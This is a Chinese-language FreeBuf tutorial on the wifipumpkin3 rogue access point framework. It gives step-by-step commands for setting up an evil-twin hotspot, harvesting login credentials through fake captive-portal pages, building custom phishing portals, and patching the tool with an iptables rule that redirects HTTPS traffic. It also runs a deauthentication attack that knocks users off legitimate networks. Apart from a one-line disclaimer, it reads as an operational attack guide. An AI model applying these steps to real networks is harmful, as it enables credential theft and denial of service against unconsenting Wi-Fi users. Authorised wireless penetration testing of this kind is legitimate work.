freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

wifipumpkin3 WiFi钓鱼工具 金币
2021-03-06 11:41:09

简介

wifipumpkin3是用Python编写wifi钓鱼攻击强大框架

可以快速方便的搭建一个钓鱼wifi,进行钓鱼或中间人攻击,免去了手动搭建环境的繁琐步骤

支持的攻击种类有:

恶意访问点攻击

中间人攻击

死角接入点攻击

额外的captiveflask模板

DNS劫持

俘虏门户攻击 (captiveflask)

拦截,检查,修改和重放网络流量

WiFi网络扫描

DNS监控服务

凭证收集

透明代理

LLMNR,NBT-NS和MDNS 投毒(Responder3)

and more!

本文章仅限于技术交流,严禁用于非法途径

安装

使用环境:kali 2021.2

网卡:RTL8812AU-VS(802.11ac 2x2 USB2.0)

依赖安装

sudo apt install hostapd  
sudo apt install libssl-dev libffi-dev build-essential
sudo apt install python3-pyqt5

框架安装

git clone https://github.com/P0cL4bs/wifipumpkin3.git
cd wifipumpkin3
sudo python3 setup.py install

安装完成后使用sudo wifipumpkin3 命令即可开启框架

image-20210305152836412

使用

搭建简单钓鱼热点

使用以下命令可以建立起一个简单的热点

# 设置热点名称
wp3 > set ssid evil
# 选择网卡
wp3 > set interface wlan0
# 设置代理插件(后面会讲)
wp3 > set proxy noproxy
wp3 > start

image-20210305153536348

这时我们就能搜索到搭建的热点

image-20210305153658637

可以正常连接,同时,我们的kali上也会显示连接情况

image-20210305153813696

利用captiveflask强制用户登录

captiveflask是框架中代理功能中的一个选项,他可以阻止连接此wifi的用户上网,并令http请求跳转到钓鱼登录页面,从而获取用户的账号密码

以内置的登录网页为例

wifipumpkin3/wifipumpkin3/plugins/captiveflask目录,有四个内置登录网页

image-20210306093505716

我们此次使用DarkLogin.py

# 设置热点名称
wp3 > set ssid evil
# 选择网卡
wp3 > set interface wlan0
# 设置代理插件
wp3 > set proxy captiveflask
# 设置模板
wp3 > set captiveflask.DarkLogin true
wp3 > start

通过proxies命令可以看到现在启用的插件和代理

image-20210306093747947

此时链接wifi,即可显示登录页面

image-20210306093906002

如果在此页面输入账号密码,就会被捕获

image-20210306101029507

未登录前所有http网站都无法访问,但是要注意的是,此插件无法拦截https流量

如果想要拦截https流量,需要做以下修改:

设定拦截https

首先关闭wifipumpkin3

修改wifipumpkin3/core/servers/proxy/captiveflask.py,在第119行添加如下

print(display_messages("redirecting HTTPS traffic", info=True))
        self.add_default_rules(
            "{iptables} -t nat -A PREROUTING -i {iface} -p tcp --dport 443 -j DNAT --to-destination {ip}:443".format(
                iptables=self.getIptablesPath, iface=IFACE, ip=IP_ADDRESS, port=PORT
            )
        )

image-20210306100406123

此时所有https流量均转发至本地443端口

sudo python3 setup.py install

再次访问就无法打开https页面

image-20210306100549929

自定义登录门户页面

首先在wifipumpkin3/wifipumpkin3/plugins/captiveflask目录添加一个模板

我们把DarkLogin.py复制一份,重命名为test.py

吧DarkLogin全替换为test

image-20210306100743007

随后修改配置文件wifipumpkin3/config/app/captive-portal.ini

image-20210306101146288

接着把前端模板按照flask的目录格式,放到wifipumpkin3/config/templates/test文件夹下

image-20210306101418527

重新编译后启动

wp3 > set ssid evil
wp3 > set interface wlan0
wp3 > set proxy captiveflask
wp3 > set captiveflask.test true
wp3 > start

image-20210306101610741

链接wifi,发现跳转到自定义页面

image-20210306101709299

执行wifi取消身份验证攻击

为了能让大部分设备连接我们的钓鱼热点,我们需要通过取消身份验证攻击令连接真实热点的设备掉线

什么是wifi取消身份验证攻击?

wifi取消身份验证攻击是一种拒绝服务攻击,它以用户和wifi接入点之间的通信为目标。

攻击者可以随时将带有身份验证对象欺骗地址的取消身份验证帧发送到无线访问点,令对象掉线。

wp3 > use wifi.wifideauth
wp3 : wifideauth > set interface wlan0
wp3 : wifideauth > scan

image-20210306110857069

将信道切换为11

image-20210306110951692

选择一个bssid

wp3 > use wifi.wifideauth
wp3 : wifideauth > set interface wlan0
wp3 : wifideauth > set target xx:xx:e2:e8:e4

image-20210306113056012

start运行后,目标wifi即无法连接

如果想将身份验证攻击与钓鱼热点结合使用,则需要准备俩网卡

本文作者:, 转载请注明来自FreeBuf.COM

# 渗透测试 # 社会工程学 # 无线安全 # 渗透测试工具 # 网络安全技术
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按热度排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
文章目录
登录 / 注册后在FreeBuf发布内容哦
收入专辑